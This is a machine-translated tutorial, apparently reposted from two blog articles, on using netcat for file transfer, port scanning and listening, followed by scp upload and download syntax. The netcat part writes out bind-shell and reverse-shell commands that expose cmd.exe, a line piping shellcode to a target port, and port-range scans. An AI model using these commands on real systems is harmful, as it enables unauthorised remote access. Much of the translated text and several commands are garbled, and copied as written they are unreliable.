Very practical tips you can use nr or scp
nc command, reprinted from: https: //www.cnblogs.com/xuybin/archive/2013/09/27/3343098.html
CAT test.txt | nc the -l -p 6666
or nc -l -p 6666 <test.txt Some versions do not -p
[listening 6666 port, waiting for a connection] (provided the sender IP is 10.20.133.152)
reception end:
6666> NC 10.20.133.152 test1.txt
as the above operation, the file can be transmitted from the transmitting test.txt end to the receiving end, save as test1.txt
Want to connect to somewhere: nc [-options] hostname port [ s] [ports] ...
to bind to port waiting for a connection: nc -l -p port [-options] [hostname] [port]
Syntax: nc [-hlnruz] [- g < Gateway ...>] [- G <pointer number>] [- i <seconds delay>] [- o <output file>] [- p <communications port> ] [- s <source address>] [- v ...] [ - w < timeout in seconds>] [host name] [... communication port]
supplementary Description: this instruction performs the router parameters.
Parameters:
-g <Gateway> provided communications gateway router hops, most lost oh 8 may be provided.
-G <point number> Settings Source route point, a value which is a multiple of four.
-h online help.
-i <delay in seconds> set the time interval for transmitting information and scan communication ports.
-l use a listening mode, incoming data management and control.
-n directly using IP address, rather than by the domain name server.
-o <output file> specify the file name, the transmission of data to and from the hexadecimal word poured into the file is saved.
-p <communications port> Set the communication port used by the local host.
-r nonce designated communication port local and remote host.
-s <Source address> set local host sends the IP address of the packet.
-u Use UDP transport protocol.
-v display process execution instruction.
-w <timeout in seconds> set the time of waiting for connection.
Use -z 0 input / output mode, only the communication port during the scan.
Further, nc command can also be used for port scanning:
NC -v the -Z -W2 10.20.133.152 1-14000
can scan numbers 1 ~ 14000 TCP port on the host 10.20.133.152;
nc -u -v -z -w2 10.20.133.152 1-14000
can scan numbers 1 ~ 14000 UDP port on the host 10.20.133.152.
nc is a very good network detection tool, the following is a detailed use.
'nc.exe -h' to see the use of each parameter.
The basic format: nc [-options] hostname Port [the ports] ...
nc the -l -p Port [Options] [hostname] [Port]
-d background mode
-e prog program redirection, once connected, on the implementation of [dangerous! !]
-g Gateway Hop Point Source-routing, up to 8
-G NUM Source-routing pointer: 4, 8, 12, ...
-h help
the interval -i secs delay
-l listening mode for the station connected
-L after the connection is closed, continue to listen
-n IP address of the specified number, not by hostname
recording transport hexadecimal File -o
-p local port number port
-r random local and remote ports
-s addr local source address
-t interactively using TELNET
-u UDP mode
-v verbose output - is obtained with two more details -v
-w secs timeout time
-z switch off the input and output - when used to scan
representation port MN can be written as a range of formats.
1) is connected to a remote host
format: nc -nvv 192.168.xx 80
Explain: TCP80 port connected to the 192.168.xx
2) listening on a local host
format: nc -l -p 80
explained: the machine TCP80 listening port
3) scanning the remote host
format: nc -nvv -w2 -z 192.168.xx 80- 445
explain: scan all ports 192.168.xx of TCP80 to TCP445 of
4) REMOTE host binding SHELL, example:
format: nc -l -p 5354 -t -ec: \ winnt \ system32 \ cmd.exe
explain: binding REMOTE CMDSHELL in TCP5354 host REMOTE host port
bindings. 5) and reversely connected SHELL REMOTE host, examples:
format: nc -t -ec: \ winnt \ system32 \ cmd.exe 192.168.xx 5354
explain: binding host REMOTE CMDSHELL and reverse connection to TCP5354 port 192.168.xx is
more than the most basic of several uses (in fact, there are many NC usage,
when the pipeline with the command "|" and redirect command "<", ">" and so on command more powerful ......).
6) for the attack procedures, examples:
Format 1: type.exe c: \ exploit.txt | nc -nvv 192.168.xx 80
Format 2: nc -nvv 192.168.xx 80 <c : \ exploit.txt
Explain: 192.168.xx 80 is connected to the port, and transmits in its pipeline: Content 'c \ exploit.txt' is (indeed both formats have the same effect, there are really the same purpose: P)
attached: 'c: \ exploit.txt 'is shellcode etc.
7) as a honeypot [1], examples:
format: nc -L -p 80
explain: using' -L '(note that a capital L) can keep a port monitor, until ctrl + c up to
8) used as honeypot [2], examples:
format: nc -L -p 80> c: \ log.txt
explain: using '-L' can constantly monitor a port until ctrl Until C +, while the output to the 'c: \ log.txt' if the '>'
to '>>' i.e. log may be added
attached: 'c: \ log.txt' of logs
9) for honeypot with [3], examples:
format 1: nc -L -p 80 <c : \ honeypot.txt
format 2: type.exe c: \ honeypot.txt | nc -L -p 80
explain: using '-L 'may constantly monitor a port until ctrl + c, and the' c: \ honeypot.txt 'content' send 'into which the pipe!
10) the backup file
data A clip machine / data backups to host B backup.tgz
source host: tar czf - work | nc -l -c -p 1234
Objective host: nc 192.168.0.1 1234> a.
B: nc a 4444> backup.tgz
pass after ctrl + c disconnected, so that the host does not generate A spread backup.tgz files directly, the disadvantage is not know when transmission finished, hey
scp command Reprinted from: https: //www.cnblogs.com/suntray/p/9771209.html
Local computer is a mac, linux server system, because the mac is no similar system under Windows ssh crt, xshell tools such as frequent use scp command file upload and download.
Command is as follows,
File Upload:
scp local file path and file name of the server user @ server address (URL, ip): server path / file server name (optional, do not fill, then automatically saved by the local file name)
E.g
scp ~/Desktop/wys/dist.zip root@xxxxx:/root/servers/crcc/wy/
document dowload:
scp user @ server server address (URL, ip): server path / file name of a local file server path / filename (optional, do not fill it, the server automatically saved with the file name)
E.g
scp root@xxxxx:/root/servers/crcc/wy/dist.zip ~/Desktop/wys/
Note that the ":" must write, if you want to write in the folder, the final "/" must be written
Special case: Due to security policy, a lot of the server's ssh port (the port that is scp), do not use the default port 22, will be changed to a different port number. -P need to add the port number on the command.
Command is as follows:
File Upload:
scp -P port number of the local file path and file name of the server user @ server address (URL, ip): server path / file server name (optional, do not fill, then automatically saved by the local file name)
E.g
scp -P port number ~ / Desktop / wys / dist.zip root @ xxxxx: / root / servers / crcc / wy /
document dowload:
scp -P port number of the server user @ server address (URL, ip): server path / file name of a local file server path / filename (optional, do not fill it, the server automatically saved with the file name)
E.g
scp -P port number root @ xxxxx: /root/servers/crcc/wy/dist.zip ~ / Desktop / wys /
Note that the ":" must write, if you want to write in the folder, the final "/" must be written
-PP is behind uppercase P is the port number, include a space between P and port number